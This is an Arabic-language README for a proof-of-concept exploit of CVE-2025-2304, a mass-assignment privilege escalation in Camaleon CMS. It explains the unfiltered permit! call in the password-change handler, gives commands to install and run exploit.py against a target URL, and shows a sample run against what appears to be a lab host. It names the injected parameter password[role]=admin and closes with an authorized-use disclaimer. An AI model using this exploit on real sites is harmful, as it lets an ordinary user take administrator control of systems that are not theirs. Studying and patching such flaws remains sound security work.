
PoC لـ CVE-2025-2304: تصعيد الامتيازات في Camaleon CMS
نظام Camaleon CMS عرضة لتصعيد الامتيازات من خلال تعيين جماعي (Mass Assignment)
توجد ثغرة تصعيد الامتيازات من خلال تعيين جماعي في نظام Camaleon CMS
عندما يرغب المستخدم في تغيير كلمة المرور الخاصة به، يتم استدعاء طريقة 'updated_ajax' في UsersController. تنبع الثغرة من استخدام الطريقة الخطيرة permit!، التي تسمح بمرور جميع المعاملات دون أي تصفية.
pip install requests beautifulsoup4
python exploit.py --url http://target.com -u username -p password
--url - عنوان URL الأساسي للتطبيق المعرض للخطر-u - اسم المستخدم للمصادقة-p - كلمة المرور للمصادقةpython exploit.py --url http://facts.htb -u krrish -p krrish
الإخراج:
[*] Logging in as krrish...
[*] Exploiting...
[+] Exploited! You're admin now
password[role]=admin المحقونةهذه الأداة مخصصة للأغراض التعليمية واختبار الأمان المصرح به فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.